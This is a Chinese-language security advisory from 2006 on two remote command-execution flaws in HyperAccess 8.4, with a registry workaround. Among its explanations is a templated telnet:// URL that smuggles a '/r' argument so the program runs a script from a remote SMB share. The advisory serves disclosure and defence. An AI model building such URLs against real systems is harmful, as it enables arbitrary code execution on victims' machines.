安全研究
安全漏洞
Hyper Access多个远程安全漏洞
发布日期:2006-12-15
更新日期:2006-12-18
受影响系统:Hilgraeve, Inc. Hyper Access 8.4
描述:
BUGTRAQ ID:
21594
CVE(CAN) ID:
CVE-2006-6596
HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。
HyperAccess中存在两个安全漏洞:
* 通过打开.HAW文件执行命令 *
HyperAccess将会话保存为.haw文件,可通过注册表中设置的editflags未经用户交互便打开这些扩展名:
HKEY_CLASSES_ROOT\HAWin32\EditFlags.
如果Internet Explorer用户浏览了包含有.HAW的站点,就会强制执行自动下载并由所安装的HyperAccess打开并解析文件。
* 通过Telnet URL协议执行命令 *
HyperAccess可通过将以下注册表项:
HKEY_CLASSES_ROOT\telnet\shell\open\command
设置为:
c:\program files\hawin32\hawin32.exe /t %1
以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL:
telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt
如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话,就会导致执行任意vbscript代码。
<*来源:Brett Moore (
brett.moore@SECURITY-ASSESSMENT.COM)
链接:
http://secunia.com/advisories/23366/
http://marc.theaimsgroup.com/?l=bugtraq&m=116611197513860&w=2
*>
建议:
临时解决方法:
* 在注册表中修改EditFlags,删除telnet控制程序。
厂商补丁:
Hilgraeve, Inc.
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hilgraeve.com/index.html浏览次数:2869
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |